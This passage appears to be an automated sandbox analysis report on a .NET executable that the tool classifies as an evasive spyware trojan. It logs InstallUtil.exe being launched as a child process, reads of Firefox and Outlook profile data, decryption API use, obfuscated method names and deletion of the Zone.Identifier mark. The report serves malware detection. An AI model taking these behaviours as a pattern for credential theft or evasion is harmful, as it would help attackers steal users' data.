                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_0652EBF00_2_0652EBF0
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07C306E00_2_07C306E0
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07C34A580_2_07C34A58
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07C545600_2_07C54560
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07C500400_2_07C50040
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07C500130_2_07C50013
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CBEFF80_2_07CBEFF8
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CBD7800_2_07CBD780
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CBCF080_2_07CBCF08
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CBAE520_2_07CBAE52
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CB8DB80_2_07CB8DB8
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CBE1480_2_07CBE148
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CB401E0_2_07CB401E
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CB2F800_2_07CB2F80
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CBCEF80_2_07CBCEF8
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E24B500_2_07E24B50
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E26E780_2_07E26E78
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E266200_2_07E26620
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E2C1D80_2_07E2C1D8
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E218200_2_07E21820
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E213F00_2_07E213F0
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E223CE0_2_07E223CE
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E223D00_2_07E223D0
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E28BA80_2_07E28BA8
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E28BB80_2_07E28BB8
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E25B680_2_07E25B68
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E24B4A0_2_07E24B4A
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E25B580_2_07E25B58
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E20B200_2_07E20B20
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E20B100_2_07E20B10
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E216680_2_07E21668
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E216780_2_07E21678
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E20E100_2_07E20E10
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E266190_2_07E26619
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E211C80_2_07E211C8
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E29DB00_2_07E29DB0
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E211B90_2_07E211B9
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E2A5180_2_07E2A518
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E200400_2_07E20040
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E214000_2_07E21400
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E200130_2_07E20013
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07E218100_2_07E21810
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07C545350_2_07C54535
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_019040F04_2_019040F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_01904D084_2_01904D08
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_019044384_2_01904438
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06AF85F04_2_06AF85F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06AF90C84_2_06AF90C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06AF75A04_2_06AF75A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06AFD3C84_2_06AFD3C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06AF90B74_2_06AF90B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06AF58284_2_06AF5828
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06C35E884_2_06C35E88
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06C337D04_2_06C337D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06C3E4104_2_06C3E410
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06C3AAD04_2_06C3AAD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06C391A84_2_06C391A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06C381684_2_06C38168
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06C388E84_2_06C388E8
                        Source: umVoLahqZn.exe, 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs umVoLahqZn.exe
                        Source: umVoLahqZn.exe, 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs umVoLahqZn.exe
                        Source: umVoLahqZn.exe, 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs umVoLahqZn.exe
                        Source: umVoLahqZn.exe, 00000000.00000002.2712396122.000000000156E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs umVoLahqZn.exe
                        Source: umVoLahqZn.exe, 00000000.00000002.2713909861.000000000373E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs umVoLahqZn.exe
                        Source: umVoLahqZn.exe, 00000000.00000002.2724787687.000000000455E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameccca13a5-9bf3-42e0-8638-f8842e08a063.exe4 vs umVoLahqZn.exe
                        Source: umVoLahqZn.exe, 00000000.00000002.2728250777.0000000008590000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs umVoLahqZn.exe
                        Source: umVoLahqZn.exe, 00000000.00000000.2045226956.00000000000DE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameu7iuh700.exeT vs umVoLahqZn.exe
                        Source: umVoLahqZn.exe, 00000000.00000002.2726127716.0000000005A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs umVoLahqZn.exe
                        Source: umVoLahqZn.exeBinary or memory string: OriginalFilenameu7iuh700.exeT vs umVoLahqZn.exe
                        Source: umVoLahqZn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: umVoLahqZn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: umVoLahqZn.exe, Kg2.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@1/1
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\umVoLahqZn.exe.logJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                        Source: umVoLahqZn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: umVoLahqZn.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: umVoLahqZn.exeReversingLabs: Detection: 71%
                        Source: unknownProcess created: C:\Users\user\Desktop\umVoLahqZn.exe "C:\Users\user\Desktop\umVoLahqZn.exe"
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: umVoLahqZn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: umVoLahqZn.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.4695470.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.4695470.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.5a70000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.5a70000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.462f142.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2726127716.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2713909861.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: umVoLahqZn.exe PID: 5812, type: MEMORYSTR
                        Source: umVoLahqZn.exe, x5.cs.Net Code: NewLateBinding.LateCall(obj7, (Type)null, "DynamicInvoke", new object[1] { new object[0] }, (string[])null, (Type[])null, (bool[])null, true)
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_01538A98 push eax; iretd 0_2_01539021
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_0153CAE7 push 4C0336FCh; ret 0_2_0153CAF5
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_065211B5 pushfd ; ret 0_2_065211B7
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07C32D90 push es; ret 0_2_07C32DA0
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07C3D44F push ecx; retf EFCDh0_2_07C3D5BA
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07C5A1A9 push ecx; retf 0046h0_2_07C5A1CA
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07C5D07C pushad ; retf 0_2_07C5D0D5
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07C5F21F push eax; iretd 0_2_07C5F22E
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CBA3ED push ds; retf 0040h0_2_07CBA43E
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CB7733 push edi; ret 0_2_07CB792E
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CB81F1 push es; ret 0_2_07CB8200
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeCode function: 0_2_07CB793C push eax; ret 0_2_07CB796D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_06C315C0 push es; ret 4_2_06C315D0
                        Source: umVoLahqZn.exeStatic PE information: section name: .text entropy: 7.173088295592971
                        Source: umVoLahqZn.exe, Kg2.csHigh entropy of concatenated method names: 'm4X', 'x8R', 'i4T', 'Zf2', 'k7Q', 'Bp3', 'Da0', 'a6R', 'Ns2', 'Wx2'
                        Source: umVoLahqZn.exe, d0N.csHigh entropy of concatenated method names: 'Hg6', 'Tq3', 'y3R', 'Tg0', 'n3Q', 'Zc9', 'p1T', 'Cx4', 'Sd9', 'i0C'
                        Source: umVoLahqZn.exe, j1.csHigh entropy of concatenated method names: 'Tm1', 'Wa8', 'Hm8', 'Fw7', 'Wn1', 'n1B', 'x5X', 'Ge2', 'Kx7', 'e3'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeFile opened: C:\Users\user\Desktop\umVoLahqZn.exe\:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
